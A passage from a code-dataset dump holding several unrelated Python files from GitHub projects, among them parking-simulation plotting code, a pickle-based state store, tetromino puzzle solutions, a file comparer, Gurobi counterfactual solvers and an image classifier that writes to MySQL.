ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n ax.legend(fontsize=25, loc=loc)\n\n fig.savefig(str(outpath / f\"income_stats_{loc}.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_share_yellow(data_df, outpath):\n \"\"\"\n Plot share of different income classes on yellow CPZ.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n # Save plot with three variants of legend location\n for loc in [\"lower right\", \"right\", \"upper right\"]:\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n color_list = [cm.bamako(0), cm.bamako(1.0 * 1 / 2), cm.bamako(1.0)]\n ax.plot(\n data_df.x,\n data_df.share_y_low / 100,\n label=\"Low Income\",\n linewidth=3,\n color=color_list[0],\n )\n ax.plot(\n data_df.x,\n data_df.share_y_middle / 100,\n label=\"Middle Income\",\n linewidth=3,\n color=color_list[1],\n )\n ax.plot(\n data_df.x,\n data_df.share_y_high / 100,\n label=\"High Income\",\n linewidth=3,\n color=color_list[2],\n )\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Share of Cars in Yellow CPZ\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n ax.legend(fontsize=25, loc=loc)\n\n fig.savefig(str(outpath / f\"share_yellow_{loc}.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_share_parked(data_df, outpath):\n \"\"\"\n Plot share of parked cars per income class.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n # Save plot with three variants of legend location\n for loc in [\"lower right\", \"right\", \"upper right\"]:\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n color_list = [cm.bamako(0), cm.bamako(1.0 * 1 / 2), cm.bamako(1.0)]\n ax.plot(\n data_df.x,\n data_df.share_p_low / 100,\n label=\"Low Income\",\n linewidth=3,\n color=color_list[0],\n )\n ax.plot(\n data_df.x,\n data_df.share_p_middle / 100,\n label=\"Middle Income\",\n 
linewidth=3,\n color=color_list[1],\n )\n ax.plot(\n data_df.x,\n data_df.share_p_high / 100,\n label=\"High Income\",\n linewidth=3,\n color=color_list[2],\n )\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Share of Cars Finding Parking\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n ax.legend(fontsize=25, loc=loc)\n\n fig.savefig(str(outpath / f\"share_parked_{loc}.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_share_vanished(data_df, outpath):\n \"\"\"\n Plot share of vanished cars per income class.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n # Save plot with three variants of legend location\n for loc in [\"lower right\", \"right\", \"upper right\"]:\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n color_list = [cm.bamako(0), cm.bamako(1.0 * 1 / 2), cm.bamako(1.0)]\n ax.plot(\n data_df.x,\n data_df.share_v_low / (data_df.low_income[0] / 100 * 525),\n label=\"Low Income\",\n linewidth=3,\n color=color_list[0],\n )\n ax.plot(\n data_df.x,\n data_df.share_v_middle / (data_df.middle_income[0] / 100 * 525),\n label=\"Middle Income\",\n linewidth=3,\n color=color_list[1],\n )\n ax.plot(\n data_df.x,\n data_df.share_v_high / (data_df.high_income[0] / 100 * 525),\n label=\"High Income\",\n linewidth=3,\n color=color_list[2],\n )\n ax.set_ylim(bottom=0, top=1.01)\n\n ax.set_ylabel(\"Normalised Share of Cars Vanished\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n ax.legend(fontsize=25, loc=loc)\n\n fig.savefig(str(outpath / f\"share_vanished_{loc}.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef create_colourbar(fig):\n \"\"\"\n Draws colourbar with colour of different CPZs on given figure.\n :param fig: Figure to draw colourbar on.\n :return:\n \"\"\"\n cmap = cm.imola\n\n fig.subplots_adjust(bottom=0.1, top=0.9, left=0.1, right=0.8, wspace=0.01)\n cb_ax = fig.add_axes([0.8, 0.1, 0.015, 0.8])\n\n bounds = [0, 1, 2, 3, 4]\n norm = matplotlib.colors.BoundaryNorm(bounds, cmap.N)\n cbar = fig.colorbar(\n matplotlib.cm.ScalarMappable(norm=norm, cmap=cmap),\n cax=cb_ax,\n orientation=\"vertical\",\n )\n\n cbar.set_ticks([])\n cbar.ax.set_ylabel(\n r\"$\\Leftarrow$ Distance of CPZ to City Centre\", fontsize=25, loc=\"top\"\n )\n\n\ndef draw_radar_plot(input_dir):\n \"\"\"\n\n :param input_dir:\n :return:\n \"\"\"\n if glob(input_dir + \"/*.pkl\"):\n median_runs = glob(input_dir + \"/*.pkl\")\n median_labels = [re.findall(\"([a-zA-Z]+).pkl\", run)[0] for run in median_runs]\n else:\n median_runs = glob(input_dir + \"/*.csv\")\n median_labels = [re.findall(\"([a-zA-Z]+).csv\", run)[0] for run in median_runs]\n\n categories = [\n \"Optimize Occupancy\",\n \"Preserve Social Composition\",\n \" Maximize Speed\",\n \"Minimize Cars\",\n ]\n categories = [*categories, categories[0]]\n color_list = sns.color_palette(\"colorblind\")\n occup_scores = []\n social_scores = []\n speed_scores = []\n n_cars_scores = []\n performance_dict = dict()\n for i, run in enumerate(median_runs):\n try:\n df = pd.read_pickle(run, compression=\"zip\")\n except (FileNotFoundError, BadZipFile):\n df = get_data_from_run(run)\n label = median_labels[i]\n 
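# gather this run's raw objective scores; they are normalised against the\n        # best run and stored in performance_dict[label]['scores'] further below\n        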
performance_dict[label] = dict()\n # Overall time\n occup_score = 0\n for c in [\"yellow\", \"green\", \"teal\", \"blue\"]:\n occup_score += (\n len(df[(df[f\"{c}_lot_occup\"] > 75) & (df[f\"{c}_lot_occup\"] < 90)])\n / len(df)\n ) * 0.25\n occup_scores.append(occup_score)\n n_cars_scores.append(1 - df[\"cars_overall\"].iloc[-1] / 100)\n speed_scores.append(df.average_speed.mean())\n social_scores.append(df.low_income.iloc[-1])\n\n for i, label in enumerate(median_labels):\n scores = []\n for score_list in [occup_scores, social_scores, speed_scores, n_cars_scores]:\n scores.append(score_list[i] / max(score_list))\n scores.append(scores[0])\n performance_dict[label][\"scores\"] = scores\n\n plt.rc(\"xtick\", labelsize=30)\n plt.rc(\"ytick\", labelsize=30)\n\n label_loc = np.linspace(start=0, stop=2 * np.pi, num=len(scores))\n\n fig = plt.figure(figsize=(20, 20))\n ax = fig.add_subplot(111, polar=True)\n for run_label, colour_i in zip(median_labels, [7, 0, 2, 1, 4, 8, 9]):\n if \"static\" in run_label or \"dynamic\" in run_label:\n label = r\"$\\mathrm{Baseline_{\" + run_label + r\"}}$\"\n else:\n label = r\"$\\mathrm{r_{\" + run_label + r\"}}$\"\n ax.plot(\n label_loc,\n performance_dict[run_label][\"scores\"],\n label=label,\n linewidth=4,\n color=color_list[colour_i],\n )\n ax.fill(\n label_loc,\n performance_dict[run_label][\"scores\"],\n alpha=0.25,\n color=color_list[colour_i],\n )\n\n ax.set_ylim(0, 1)\n\n ax.set_thetagrids(np.degrees(label_loc), labels=categories)\n for label, category in zip(ax.get_xticklabels(), categories):\n if \"Speed\" in category:\n label.set_horizontalalignment(\"left\")\n elif \"Occup\" in category:\n label.set_horizontalalignment(\"right\")\n ax.set_theta_offset(np.pi)\n ax.legend(fontsize=28, loc=\"upper right\", bbox_to_anchor=(1.35, 1.15))\n # ax.xaxis.set_tick_params(pad=15)\n ax.axes.yaxis.set_ticklabels([])\n #\n plt.tight_layout()\n ax.spines[\"polar\"].set_color(\"#222222\")\n\n fig.savefig(\"radar_plot.pdf\", bbox_inches=\"tight\")\n\n plt.show()\n","repo_name":"JakobKappenberger/ai-priced-parking","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":27542,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40127159523","text":"import os\nimport typing\nimport inspect\nimport pickle\nimport warnings\nimport portalocker\nimport pathlib\n\nExportable = type(typing.Any)(\n \"Exportable\",\n doc=\"\"\"Special type indicating an exportable type for the offshore package.\n This type behaves like Any for all practical purposes.\n \"\"\",\n)\n\n\nclass Offshore:\n def __init__(self, filename=\".offshore\", autosave=False, autoload=False):\n self._stack = inspect.stack()\n self._path = pathlib.Path(os.getcwd()) / filename\n self._autosave = bool(autosave)\n self._autoload = bool(autoload)\n self._store = {}\n\n try:\n self._load()\n except FileNotFoundError:\n self.dump()\n\n def __getattr__(self, item):\n if self._autoload:\n self.load()\n\n try:\n return self._store[item]\n except KeyError as e:\n raise AttributeError(str(e))\n\n def __setattr__(self, key, value):\n if key.startswith(\"_\"):\n self.__dict__[key] = value\n return\n\n self._store[key] = value\n\n if self._autosave:\n self.dump()\n\n def __getitem__(self, item):\n if self._autoload:\n self.load()\n\n return self._store[item]\n\n def __setitem__(self, key, value):\n self._store[key] = value\n\n if self._autosave:\n self.dump()\n\n def __delitem__(self, key):\n del self._store[key]\n\n if self._autosave:\n 
self.dump()\n\n    def __contains__(self, item):\n        if self._autoload:\n            self.load()\n\n        return item in self._store\n\n    def __len__(self):\n        if self._autoload:\n            self.load()\n\n        return len(self._store)\n\n    def _load(self):\n        with portalocker.Lock(str(self._path), \"rb\", timeout=60) as file:\n            self._store = pickle.load(file)\n\n    @staticmethod\n    def _parse_stack(stack):\n        frame = stack[1][0]\n        global_vars = frame.f_globals\n        module = inspect.getmodule(frame)\n\n        if module is None:\n            return [], global_vars\n\n        annotations = [key for key, value in typing.get_type_hints(module).items() if value is Exportable]\n        return annotations, global_vars\n\n    def clear(self):\n        self._store = {}\n        self.dump()\n\n    def snapshot(self):\n        annotations, global_vars = self._parse_stack(self._stack)\n\n        if not annotations:\n            warnings.warn(f\"No exportable variables found\")\n\n        for key in annotations:\n            self._store[key] = global_vars[key]\n\n        self.dump()\n\n    def restore(self):\n        annotations, global_vars = self._parse_stack(self._stack)\n\n        if not annotations:\n            warnings.warn(f\"No exportable variables found\")\n\n        self.load()\n\n        for key in annotations:\n            if key not in self._store:\n                warnings.warn(f\"Key '{key}' was not found in the state store and has not been restored\")\n                continue\n\n            global_vars[key] = self._store[key]\n\n    def dump(self):\n        with portalocker.Lock(str(self._path), \"wb\", timeout=60) as file:\n            pickle.dump(self._store, file)\n\n            file.flush()\n            os.fsync(file.fileno())\n\n    def load(self):\n        try:\n            self._load()\n        except FileNotFoundError:\n            warnings.warn(f\"State store not found in '{str(self._path)}'\")\n","repo_name":"kpdemetriou/offshore","sub_path":"offshore/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"4273916733","text":"import codecs\n\nline_seen=set() # initialise an empty (unordered) set of lines already seen\n\nin_file=codecs.open('I:/codes/track4new.txt','r',encoding='utf-8')\n\nout_file=codecs.open('I:/codes/track4.1.txt','w',encoding='utf-8')\n\nlines=in_file.readlines()\n\nfor line in lines:\n    if line not in line_seen:\n        out_file.write(line)\n        line_seen.add(line)\n\nin_file.close()\nout_file.close()\n","repo_name":"LuicelZhou/MultiView-Tracking-ReID","sub_path":"Detecting_and_Tracking/cleaning.py","file_name":"cleaning.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"20876661221","text":"'''\nDdakji Game\nhttps://www.acmicpc.net/problem/14696\nBaekjoon Bronze 1, #14696\n\nTwo children, A and B, play a game of ddakji. The rules are as follows. Each child starts with several ddakji cards, and in every round each plays one of the cards they hold. A card is marked with one or more of four shapes: star (★), circle (●), square (■) and triangle (▲). Which of the two played cards is stronger is decided by the following rules.\n\nIf the two cards differ in the number of stars, the card with more stars wins.\nIf the star counts are equal but the circle counts differ, the card with more circles wins.\nIf the star and circle counts are equal but the square counts differ, the card with more squares wins.\nIf the star, circle and square counts are equal but the triangle counts differ, the card with more triangles wins.\nIf the star, circle, square and triangle counts are all equal, the round is a draw.\n\nGiven the number of rounds N and the cards the two children play in order, write a program that prints the result of each round.\n'''\n\n\nN = int(input()) # total number of rounds\n\nfor _ in range(N):\n    A = {4:0, 3:0, 2:0, 1:0} # counts of each shape on the played card\n    B = {4:0, 3:0, 2:0, 1:0}\n    _, *arg = map(int, input().split())\n    for a in arg:\n        A[a] += 1\n    _, *arg = map(int, input().split())\n    for b in arg:\n        B[b] += 1\n\n\n    for i in range(4, 0, -1): # check from 4 (stars) downwards\n        if A[i] > B[i]:\n            print('A')\n            break\n        elif B[i] > A[i]:\n            print('B')\n            break\n    else:\n        print('D') # draw\n\n\n","repo_name":"seoda0000/TIL","sub_path":"AlgorithmProblemSolving/04_백준/Bronze/14696_딱지놀이.py","file_name":"14696_딱지놀이.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"42074071111","text":"from random import randint\nfrom termcolor import colored\nimport colorama\n\ncolorama.init()\n\n\ndef alg(a, i, j):\n    if j - i == 1:\n        if a[i] < 0 and a[j] > 0:\n            return i\n        else:\n            return \"not there\"\n\n    m = (i + j) // 2\n    if a[m] > 0:\n        return alg(a, i, m)\n    else:\n        return alg(a, m, j)\n\n\nLIM = 15\n\nfor _ in range(LIM // 2):\n    array = [randint(LIM * -1, LIM) for _ in (range(randint(2, LIM)))]\n    array.sort()\n    # to remove duplicates\n    array = list(dict.fromkeys(array))\n    if array[- 1] < 0:\n        array.append(array[- 1] * -1 + 1)\n    if array[0] > 0:\n        array[0] = array[0] * -1\n    _n = len(array)\n\n    alg_res = alg(array, 0, _n - 1)\n\n    expected_value = \"not there\"\n    for ind in range(_n - 1):\n        if array[ind] < 0 and array[ind + 1] > 0:\n            expected_value = ind\n            break\n\n    print(f'array: {array}\\nn : {_n}\\nexpected result: {expected_value}\\nalg result: {alg_res}\\nsame results: {colored(\"True\", \"green\") if alg_res == expected_value else colored(\"False\", \"red\")}\\n')\n","repo_name":"OB-UNISA/Algorithm-Design","sub_path":"exercises/exercises2_10.py","file_name":"exercises2_10.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30450677949","text":"from django.db import models\nfrom user_accounts.models import CustomUser\n\n# Create your models here.\nLOG = (\n    ('Report','Report'),\n    ('Refer','Refer'),\n    ('Tip Upload','Tip Upload'),\n    ('Physical','Physical'),\n    ('Relationship','Relationship'),\n    ('Book Reading','Book Reading'),\n    ('Meditation','Meditation'),\n\n)\nclass PointLogs(models.Model):\n    log_description = models.CharField(max_length=500)\n    user = models.ForeignKey(CustomUser,on_delete=models.CASCADE)\n    datetime = models.DateTimeField(auto_now_add = True)\n    log_type = models.CharField(max_length=100,choices=LOG)","repo_name":"Prakash617/bookwish","sub_path":"logs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23077780623","text":"#-*- encoding:UTF-8 -*-\n'''\nCreated on 2019/6/30\n\n@author: xcKev\n'''\n\nimport difflib\nimport alvintools.common_filer as filer\nimport alvintools.common_logger as log\nimport sys\ncurrent_log=log.get_log('comparer', log.LOG_DIR, 'comparer')\n\ndef compare_file(file_path1,file_path2,diff_path):\n
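    # Builds an HTML side-by-side diff of the two input files with difflib.HtmlDiff\n    # and writes it to diff_path; blank input paths abort the run via sys.exit().\n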
    if file_path1 == \"\" or file_path2 ==\"\":\n        current_log.info(F\"path can't be blank: first path:{file_path1},second path:{file_path2}\")\n        sys.exit()\n    else:\n        current_log.info(F\"comparing file between {file_path1} and {file_path2}\")\n        text1_lines = filer.get_file_details(file_path1)\n        text2_lines = filer.get_file_details(file_path2)\n        diff = difflib.HtmlDiff()\n        result = diff.make_file(text1_lines, text2_lines)\n        try:\n            result_h = open(diff_path,'w')\n            result_h.write(result)\n            current_log.info(\"Comparison finished successfully\\n\")\n        except IOError as error:\n            current_log.error(F\"Failed to write html diff file: {error}\")","repo_name":"Kevin-san/ToolLesson","sub_path":"core/alvintools/common_comparer.py","file_name":"common_comparer.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7885179866","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nfrom Text_Traffic_Analysis.Packet_Segment import pkt_seg_by_delimiters\nfrom Text_Traffic_Analysis.Select_Words import top_words_set, select_key_words\nfrom Text_Traffic_Analysis.Format_Extract import infer_protocol_format\nfrom Text_Traffic_Analysis.Protocol_Feature import get_traffic_feature\n\ndef Text_Re(DATA_PATH, MODE, NAME):\n\n    print(os.path.join(DATA_PATH, \"text_tcp/0\"))\n    if os.path.exists(os.path.join(DATA_PATH, \"text_tcp/0\")):\n        DATA_PATH += \"/text_tcp/0/\"\n    else:\n        print(\"[info] No text data set.\")\n        return\n    if len(os.listdir(DATA_PATH)) < 50:\n        print(\"[info] No text data.\")\n        return \n\n    SEG_OUT_PATH = './run_file/seg_' + NAME \n    WORDS_PATH = './run_file/words_' + NAME \n    P_OUT_PATH = './run_file/pattern_' + NAME \n\n    print(\"Data directory path: \", DATA_PATH)\n\n    # Protocol reverse engineering starts here\n    first_words = pkt_seg_by_delimiters(DATA_PATH, SEG_OUT_PATH)\n\n    tagged_weighted_word = top_words_set(SEG_OUT_PATH, WORDS_PATH)\n\n    f_words, b_words, f_data, b_data = select_key_words(tagged_weighted_word, DATA_PATH, P_OUT_PATH, MODE)\n\n    f_formats, b_formats = infer_protocol_format(P_OUT_PATH)\n\n    # Infer protocol feature strings from the reverse-engineered message formats\n    get_traffic_feature(NAME, f_formats, b_formats, f_data, b_data, DATA_PATH, MODE)\n","repo_name":"737898487/2018","sub_path":"Text_Traffic_Analysis/Text_Entrance.py","file_name":"Text_Entrance.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43088349066","text":"import numpy as np\n\n\nALL_DIRECTIONS = np.array(\n    [[-1, -1], [-1, 0], [-1, 1],\n     [0, -1], [0, 0], [0, 1],\n     [1, -1], [1, 0], [1, 1]]\n)\nNW, N, NE, W, NOOP, E, SW, S, SE = ALL_DIRECTIONS\n\n\ndef get_movement_vectors(num_directions: int):\n    mapping = {9: ALL_DIRECTIONS,\n               8: np.stack([NW, N, NE, W, E, SW, S, SE]),\n               5: np.stack([W, N, E, S, NOOP]),\n               4: np.stack([W, N, E, S])}\n    if num_directions not in mapping:\n        raise ValueError(\"Can only handle 9, 8, 5 or 4 directions!\")\n    return mapping[num_directions]\n\n\nclass MovementTranslator:\n\n    @staticmethod\n    def translate(opencv_keypress):\n        return {\n            -1: NOOP, 83: E, 81: W, 82: N, 84: S, 27: None,\n            119: N, 115: S, 97: W, 100: E\n        }[opencv_keypress]\n","repo_name":"csxeba/grund","sub_path":"grund/util/movement.py","file_name":"movement.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35608957389","text":"'''\nCreated on 12 Nov 2013\n\n@author: fafey\n'''\n\nfrom z3 import *\n\n\nx = Int('x')\ny = Int('y')\n
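# 'fun' below is an uninterpreted Int -> Int function; ForAll then forces it\n# to be the constant 10, so the extra constraint fun(y) == 1 is unsatisfiable.\n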
IntSort())\n\n\n\nsolve(x > 5, x<7, ForAll(x, fun(x) == 10), fun(y) == 1)\n","repo_name":"songhui/cspadapt","sub_path":"vmplacement/z4/src/DatatypeTest.py","file_name":"DatatypeTest.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"71345239253","text":"# Charles Buyas cjb8qf\n\n\nimport random\nprint(\"Input a -1 to play with a random number\")\nstart = int(input(\"What should the answer be?: \"))\ncount = 0\nif start == -1:\n start = random.randint(1, 100)\nelse:\n num = start\n\nwhile count < 4:\n guess = int(input(\"Guess a number: \"))\n if int(guess) == int(start):\n print(\"You win!\")\n exit(0)\n elif int(guess) > int(start):\n count += 1\n print(\"The number is lower than that.\")\n else:\n count += 1\n print(\"The number is higher than that.\")\n\nif count == 4:\n guess = int(input(\"Guess a number: \"))\n if int(guess) == int(start):\n print(\"You win!\")\n exit(0)\n else:\n print(\"You lose; the number was \" + str(start) + \".\")\n","repo_name":"AliveSphere/Introductory_PyCharm_Files","sub_path":"POTD/higher_lower.py","file_name":"higher_lower.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39676764635","text":"# 브루트포스 풀이\n'''\n주어진 테트로미노를 회전, 대칭하여 만들어지는 가지수는 총 19종류이다.\n문제에서 주어지는 종이를 2중 for문으로 탐색하면서, 주어진 테트로미노 형태의 숫자 합계를 비교한다.\n각 테트로미노당 정사각형 4개로 이루어져 있으므로 i, j가 이동하는 delta를 3개씩 19종류, 총 57개의 delta를 만들어둔다.\n본 풀이에서 delta의 순서는 문제에 주어진 도형을 회전/대칭 후 회전 하는 순서대로 설정하였다.\n'''\n# [A] 테트로미노의 경우의 수에 따른 delta 설정\ndi = [0, 0, 0, 1, 2, 3, 0, 1, 1, 1, 2, 2, 0, 0, 1, 0, 1, 2, 0, 0, -1, 0, -1, -2, 1, 1, 1, 0, 1, 2, 0, 0, 1, 1, 1, 2, 0, -1, -1, 1, 1, 2, 0, 1, 1, 0, 0, 1, -1, 0, 1, 1, 1, 1, 1, 2, 1]\ndj = [1, 2, 3, 0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 2, 0, 1, 1, 1, 1, 2, 2, 1, 1, 1, 0, 1, 2, 1, 0, 0, 1, 2, 2, 0, 1, 1, 1, 1, 2, 0, -1, -1, 1, 1, 2, 1, 2, 1, 1, 1, 1, -1, 0, 1, 0, 0, 1]\ndirection = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27, 30, 33, 36, 39, 42, 45, 48, 51, 54]\n\n# [1] 입력값 설정\nfrom sys import stdin\nN, M = map(int, stdin.readline().split())\npaper = [[] for _ in '_'*N]\nfor i in range(N):\n paper[i] = list(map(int, stdin.readline().split()))\n\n# [2] 종이에 적혀진 수 탐색 시작\nresult = 0\nfor i in range(N):\n for j in range(M):\n for dr in direction:\n sumV = paper[i][j] # dr이 갱신될 때마다 sumV도 초기화된다.\n\n ni, nj = i+di[dr], j+dj[dr] # 첫 번째 ni, nj\n if 0 <= ni < N and 0 <= nj < M:\n sumV += paper[ni][nj]\n\n ni, nj = i+di[dr+1], j+dj[dr+1] # 두 번째 ni, nj\n if 0 <= ni < N and 0 <= nj < M:\n sumV += paper[ni][nj]\n\n ni, nj = i+di[dr+2], j+dj[dr+2] # 마지막 ni, nj\n if 0 <= ni < N and 0 <= nj < M:\n sumV += paper[ni][nj]\n\n # 총 4개의 수를 더했다면 result값과 비교\n if result < sumV:\n result = sumV\n\nprint(result)\n\nㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ\n# DFS 풀이\n# [A] delta 방향 설정\ndi = [-1, 1, 0, 0]\ndj = [0, 0, -1, 1] # 상하좌우\n\n# [B] dfs 함수 설정\ndef dfs(i, j, n, sumV):\n global result\n # [B-1] 가지치기 조건. 아무리 max를 더해도 result보다 작을 때\n if result > sumV + maxV * (4 - n):\n return\n # [B-2] 종료 조건. 
4개의 정사각형을 더했다면 result값과 비교\n if n == 4:\n if result < sumV:\n result = sumV\n return\n\n # [B-3] 상하좌우 방향대로 dfs 탐색\n for dr in range(4):\n ni, nj = i+di[dr], j+dj[dr]\n if 0 <= ni < N and 0 <= nj < M and not visited[ni][nj]:\n if n == 2: # [B-4] 이 조건을 넣지 않으면 'ㅏ' 블럭이 만들어지지 않는다.\n visited[ni][nj] = 1\n dfs(i, j, n+1, sumV + paper[ni][nj])\n visited[ni][nj] = 0\n\n visited[ni][nj] = 1\n dfs(ni, nj, n+1, sumV + paper[ni][nj])\n visited[ni][nj] = 0\n\n# [1] 입력값 설정\nfrom sys import stdin\nN, M = map(int, stdin.readline().split())\npaper = [[] for _ in '_'*N]\nfor i in range(N):\n paper[i] = list(map(int, stdin.readline().split()))\n\n# [2] dfs 탐색\nresult = 0\nmaxV = max(map(max, paper))\nvisited = [[0]*M for _ in '_'*N]\nfor i in range(N):\n for j in range(M):\n visited[i][j] = 1\n dfs(i, j, 1, paper[i][j])\n visited[i][j] = 0\n\nprint(result)","repo_name":"Seori15/algorithm","sub_path":"python/BOJ/BOJ_14500_테트로미노.py","file_name":"BOJ_14500_테트로미노.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"39533115944","text":"\"\"\"StudentiUniMi URL Configuration\n\nThe `urlpatterns` list routes URLs to views.\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.http import HttpResponse, HttpRequest\nfrom django.urls import path, include\nfrom django.views.generic import RedirectView\nfrom sentry_sdk import configure_scope\n\nimport telegrambot.urls\nimport university.urls\n\nadmin.site.site_header = \"Network StudentiUniMi - administration\"\n\n\ndef healthcheck(_: HttpRequest) -> HttpResponse:\n with configure_scope() as scope:\n if scope.transaction:\n scope.transaction.sampled = False\n return HttpResponse(\"hello, you hacker!\\n\", content_type=\"text/plain\")\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/', include(university.urls)),\n path('telegrambot/', include(telegrambot.urls)),\n url(r'^robots.txt$', lambda r: HttpResponse(\n \"User-Agent: *\\nDisallow: /\",\n content_type=\"text/plain\",\n ), name=\"robots_txt\"),\n url(r\"^healthcheck$\", healthcheck, name=\"healthcheck\"),\n]\n\nif not settings.DEBUG:\n urlpatterns.append(\n path('', RedirectView.as_view(url=\"https://api.studentiunimi.it/admin/\"),\n name='root-redirect'),\n )\n","repo_name":"StudentiUniMi/backend","sub_path":"StudentiUniMi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"25164658409","text":"import numpy as np\nfrom gurobipy import quicksum\n\nfrom CounterfactualAnalysis.TreeEnsembleSolver import CESolver_TreeEnsemble\n\nclass CESolver_RandomForest(CESolver_TreeEnsemble):\n def __init__(self, estimator, lambda0, lambda1, lambda2, eps, timelimit):\n super().__init__(estimator, lambda0, lambda1, lambda2, eps, timelimit)\n self.T = self.estimator.n_estimators\n self.M1 = 1\n self.M2 = 1\n\n def build(self, x0, yCE):\n super().build(x0, yCE)\n self.class_assignment = self.model.addConstrs((quicksum(self.getWeight(t,l,yCE)*self.z[t,l] for t in range(self.T) for l in self.getLeaves(t)) >= 1.e-4 + quicksum(self.getWeight(t,l,k)*self.z[t,l] for t in range(self.T) for l in self.getLeaves(t)) for k in self.K if k!=yCE))\n self.reset.append(self.class_assignment)\n\n def getWeight(self, t, l, k):\n value = self.getTree(t).value[l,0,:]\n return 
(1/self.T*(value[np.where(self.K==k)[0]]/np.sum(value)))[0]\n","repo_name":"ceciliasalvatore/sFCCA","sub_path":"CounterfactualAnalysis/RandomForestSolver.py","file_name":"RandomForestSolver.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15341155148","text":"import base64\r\nimport mysql.connector\r\nfrom datetime import date\r\nimport time\r\nimport numpy as np\r\nfrom keras.models import load_model\r\nfrom keras.utils import load_img, img_to_array\r\nfrom io import BytesIO\r\n\r\ndef predict_value(bytes_data):\r\n model = load_model(\"E:/APASD/predimg.h5\")\r\n # Create a binary buffer from the bytes object\r\n buffer = BytesIO(bytes_data)\r\n\r\n image = load_img(buffer, target_size=(150,150))\r\n image = img_to_array(image)\r\n image = np.expand_dims(image,axis=0)\r\n val = model.predict(image)\r\n if val>0.5:\r\n return \"Signature\"\r\n else:\r\n return \"Photograph\"\r\n\r\ndef insertIMAGEDATA(image):\r\n try:\r\n connection = mysql.connector.connect(\r\n host=\"127.0.0.1\",\r\n user=\"root\",\r\n database=\"mydatabase\",\r\n password=\"P@ssword1\"\r\n )\r\n \r\n cursor = connection.cursor()\r\n query = \"\"\" INSERT INTO IMAGEDATA\r\n (UPLOADED_DATE, DATE, UPLOADED_TIME, TIME, IMAGE, PREDICTED_VALUE) \r\n VALUES (%s,%s,%s,%s,%s,%s)\"\"\"\r\n \r\n uploaded_date = date.today()\r\n r_date = uploaded_date.strftime(\"%d %B, %Y\")\r\n uploaded_time = time.strftime(\"%I:%M:%S\",time.localtime())\r\n 